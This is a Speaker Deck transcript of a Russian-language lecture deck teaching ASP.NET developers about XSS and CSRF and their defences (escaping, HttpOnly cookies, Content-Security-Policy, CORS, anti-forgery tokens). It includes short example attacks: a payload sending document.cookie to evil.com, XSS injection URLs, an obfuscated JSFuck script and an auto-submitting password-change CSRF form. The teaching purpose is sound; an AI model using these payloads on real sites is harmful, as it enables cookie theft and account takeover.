Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Шпора.Безопасность

ar7z1
March 27, 2016
Programming
1
68

 Шпора.Безопасность

ar7z1

March 27, 2016
Tweet

More Decks by ar7z1

See All by ar7z1
XSS & CSRF 2.0
ar7z1
0
100
HappyDev 2015
ar7z1
0
91
XSS&CSRF
ar7z1
0
130

Other Decks in Programming

See All in Programming
Importmapを使ったJavaScriptの 読み込みとブラウザアドオンの影響
swamp09
4
1.3k
型付き API リクエストを実現するいくつかの手法とその選択 / Typed API Request
euxn23
4
1.1k
Streams APIとTCPフロー制御 / Web Streams API and TCP flow control
tasshi
2
340
ふかぼれ!CSSセレクターモジュール / Fukabore! CSS Selectors Module
petamoriken
0
150
Click-free releases & the making of a CLI app
oheyadam
2
110
3rd party scriptでもReactを使いたい! Preact + Reactのハイブリッド開発
righttouch
PRO
1
590
JavaでLチカしたい! / JJUG CCC 2024 Fall LT
nhayato
0
120
CSC509 Lecture 09
javiergs
PRO
0
140
アジャイルを支えるテストアーキテクチャ設計/Test Architecting for Agile
goyoki
9
3.2k
よくできたテンプレート言語として TypeScript + JSX を利用する試み / Using TypeScript + JSX outside of Web Frontend #TSKaigiKansai
izumin5210
1
330
見せてあげますよ、「本物のLaravel批判」ってやつを。
77web
6
7.3k
EventSourcingの理想と現実
wenas
6
2.2k

Featured

See All Featured
Facilitating Awesome Meetings
lara
50
6.1k
The Art of Programming - Codeland 2020
erikaheidi
52
13k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
42
9.2k
Code Reviewing Like a Champion
maltzj
520
39k
The Language of Interfaces
destraynor
154
24k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
27
4.2k
Happy Clients
brianwarren
97
6.7k
The Cult of Friendly URLs
andyhume
78
6k
Agile that works and the tools we love
rasmusluckow
327
21k
Code Review Best Practice
trishagee
64
17k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
25
1.8k
Bash Introduction
62gerente
608
210k

Transcript

  1. Security Зиненко Артем [email protected]

  2. XSS CSRF

  3. Cross Site Scripting

  4. None

  5. @if (Model.UserQuery != null) { <div>По запросу &laquo; <b>@Html.Raw(Model.UserQuery)</b> &raquo;

    ничего не найдено.</div> }
  6. None
  7. None
  8. None

  9. document.write( '<img src="http:// evil.com/' + document.cookie + '">');

  10. Same Origin Policy

  11. window.location.href = “https:// online.sbeerbank.com”;

  12. document.write('<script src=https://pastebin.com/ raw/tvLXq0G9><\/script>')

  13. None
  14. None

  15. Какие бывают?

  16. Reflected

  17. None

  18. http://site.com/ search? q=<script>…</ script>

  19. Stored

  20. None

  21. <img src="x" onerror=“…”>

  22. DOM-based

  23. None

  24. http://site.com/ search#'><img src=x onerror=…>

  25. http://candy-web- security.apphb.com XSS

  26. https://xss- game.appspot .com

  27. Защита

  28. Preventing XSS (Google) https://goo.gl/6O42ey

  29. HttpOnly cookie

  30. Set-Cookie: qqq=lalala; HttpOnly

  31. None

  32. OWASP XSS Filter Evasion Cheat Sheet https://goo.gl/lyQiI

  33. jsfuck.com

  34. [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+! +[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+ []]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[]) [!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+ [])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([! []]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+ (!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+ ([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+ (!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+ [][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!!

    []+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]] +(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+ [+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+ []+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]] ((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+ []]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+ ([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+ []]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+ [+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+ [+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+ []+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

  35. Экранируй все

  36. <script>...</script> &lt;script&gt;...&lt; /script&gt;

  37. innerHTML document.write eval @Html.Raw(…)

  38. X-XSS-Protection

  39. X-XSS- Protection: 1

  40. X-XSS- Protection: 0

  41. X-XSS- Protection: 1; mode=block

  42. https://github.com/ ar7z1/cws/ XssController.Level1

  43. Content-Security-Policy X-Content-Security- Policy X-WebKit-CSP

  44. Content-Security- Policy: default-src ‘self’ https:// cdn.example.com <script src=“//cdn.example.com/ script.js”></script>

  45. None

  46. <script> //какой-то javascript </script>

  47. Content-Security- Policy: script-src ‘self’ unsafe-inline https:// cdn.example.com

  48. Content-Security-Policy: script- src ‘self’ ‘nonce-EDNnf03n…’ <script nonce=EDNnf03n...> //какой-то javascript </script>

  49. Content-Security-Policy: script- src ‘sha256- qznLcsROx4GACP2dm0UCKCzCG +HiZ1guq6ZZDob/Tng=’ <script>alert('Hello, world.');</script>

  50. None

  51. echo -n "alert('Hello, world.’);" | openssl dgst -sha256 -binary |

    openssl enc -base64

  52. eval() new Function() setTimeout([string], …) setInterval([string], …) ‘unsafe-eval’

  53. report-uri /…;

  54. { "csp-report": { "document-uri": "http://example.org/ page.html", "referrer": "http://evil.example.com/ haxor.html", "blocked-uri":

    "http:// evil.example.com/image.png", "violated-directive": "default-src 'self'", "effective-directive": "img-src", "original-policy": "default-src 'self'; report-uri http://example.org/csp- report.cgi" } }

  55. Content- Security-Policy- Report-Only: script-src 'self'; ...; report-uri /uri;

  56. https://github.com/ ar7z1/cws/ XssController.Level2

  57. <system.web> <httpRuntime requestValidationMode="4.0" /> </system.web> <system.web> <pages validateRequest="true" /> </system.web>

  58. Ссылки • Candy Web Security GitHub • HttpOnly • Request

    Validation in ASP.NET • Using Content Security Policy • Content Security Policy Level 2 • Cross-site scripting от Google • OWASP Top 10 for .NET developers part 2: Cross-Site Scripting (XSS) • Understanding XSS – input sanitisation semantics and output encoding contexts • How to break your site with a content security policy: an illustrated example • troyhunt.com

  59. Cross Site Request FORGERY

  60. None

  61. GET /index.html

  62. GET /index.html

  63. GET /index.html GET /image.png

  64. GET /index.html GET /image.png

  65. CROSS DOMAIN REQUESTS

  66. site.com

  67. site.com GET /emails gmail.com

  68. site.com GET /emails gmail.com

  69. Same Origin Policy

  70. protocol://host:port

  71. https://site.com http://site.com https://a.site.com https://site.com:9090

  72. CROSS ORIGIN RESOURCE SHARING

  73. GET HEAD POST METHODS

  74. Accept Accept-Language Content-Language Content-Type HEADERS

  75. application/x-www- form-urlencoded multipart/form- data text/plain CONTENT-TYPE

  76. var r = new XMLHttpRequest(); r.open('GET', ‘http://site2.com’, true); r.send();

  77. GET / HTTP/1.1 Host: site2.com Origin: http://site1.com/

  78. HTTP/1.1 200 OK Access-Control- Allow-Origin: http://site1.com [Data]

  79. var r = new XMLHttpRequest(); r.open('GET', ‘http:// site2.com’, true); r.withCredentials

    = true; r.send();

  80. GET / HTTP/1.1 Host: site2.com Origin: http://site1.com/ Cookie: token=ab7…

  81. HTTP/1.1 200 OK Access-Control-Allow- Origin: http:// site1.com Access-Control-Allow- Credentials: true

    [Data]

  82. PREFLIGHTED REQUESTS

  83. var r = new XMLHttpRequest(); r.open('POST', ‘http:// site2.com’, true); r.setRequestHeader(‘Content-

    Type’,'application/json'); r.setRequestHeader('X-HEADER', 'lalala'); r.send(data);

  84. OPTIONS / HTTP/1.1 Host: site2.com Origin: http://site1.com/ Access-Control-Request- Method: POST

    Access-Control-Request- Headers: X-HEADER

  85. HTTP/1.1 200 OK Access-Control-Allow-Origin: http://site1.com Access-Control-Allow- Methods: POST, GET, OPTIONS

    Access-Control-Allow- Headers: X-HEADER

  86. POST / HTTP/1.1 Host: site2.com Origin: http://site1.com/ X-HEADER: lalala Content-Type:

    application/json [Data]

  87. HTTP/1.1 200 OK Access-Control- Allow-Origin: http://site1.com [Data]

  88. None

  89. Cross-origin reads var r = new XMLHttpRequest(); r.open('GET', ‘http:// site2.com’,

    true); r.withCredentials = true; r.send();

  90. Cross-origin writes var c = new XMLHttpRequest(); c.withCredentials = true;

    c.open("POST", ...); c.setRequestHeader("Content- Type", “...”); c.send(...);

  91. Cross-origin embedding $(‘…’).append( ‘<img src=“…”>’ );

  92. Bad CORS

  93. Access-Control- Allow-Origin: * Access-Control- Allow- Credentials: true

  94. CHANGE PASSWORD

  95. None

  96. POST /profile password:78330… retypedPassword:2c84…

  97. None
  98. None

  99. GET evil.com

  100. GET evil.com

  101. <form method=“POST” action=“http:// service.com/profile”> <input type=“hidden” name=“password” value=“78330…” /> <input

    type=“hidden” name=“retypedPassword” value=“2c84…” /> </form>

  102. <form method=“POST” action=“http://service.com/profile”> <input type=“hidden” name=“password” value=“78330…”/> <input type=“hidden” name=“retypedPassword”

    value=“2c84…”/> </form>

  103. <script> window.onload = function(){ … form.submit(); } </script>

  104. POST /profile password, retypedPassword GET evil.com

  105. HACKED

  106. http://candy-web- security.apphb.com CSRF

  107. <!DOCTYPE html> <html> <head> <title>CSRF</title> </head> <body> <form method="post" action=“...”>

    ... </form> </body> </html>

  108. CSRF PROTECTION

  109. Короткоживущие cookie

  110. REFERER

  111. GET /changePassword HTTP/1.1 Host: site.com Origin: evil.com Referer: http://evil.com/ evilPage

  112. site.com vs. site.com.attacker.com

  113. CAPTCHA

  114. None
  115. None
  116. None

  117. CSRF TOKEN

  118. None

  119. GET /page

  120. <%= Html.AntiForgeryToken() %> @Html.AntiForgeryToken()

  121. <input type=“hidden” name=“__RequestVerifica tionToken” value=“6fGBtLZmVBZ59oUa d1Fr33BuPxANKY8[...]”/>

  122. GET /profile

  123. GET /profile

  124. [ValidateAnti ForgeryToken]

  125. None

  126. AntiForgery .GetTokens( string oldCookieToken, out string newCookieToken, out string formToken)

  127. $.ajax("/api/...", { type: "POST", contentType: "application/json", data: JSON.stringify(...), dataType: "json",

    headers: { "X-CSRF-Token": "…" } });

  128. public override void OnActionExecuting (HttpActionContext actionContext) { actionContext.Request.Headers.TryGetValues( "X-CSRF-Token", out

    tokenHeaders) ... actionContext.Request.Headers.GetCookies( “CSRF-Cookie") ... AntiForgery.Validate(cookieToken, formToken);

  129. https://github.com/ ar7z1/cws/ CsrfController.Level1

  130. Ссылки • Same Origin Policy • CORS • CSRF Prevention

    Cheat Sheet • Preventing CSRF Attacks in ASP.NET Web API • Anatomy of a Cross-site Request Forgery Attack • Preventing CSRF With Ajax • CSRF Attacks and Web Forms • haacked.com
  131. None

  132. @troyhunt

  133. [email protected]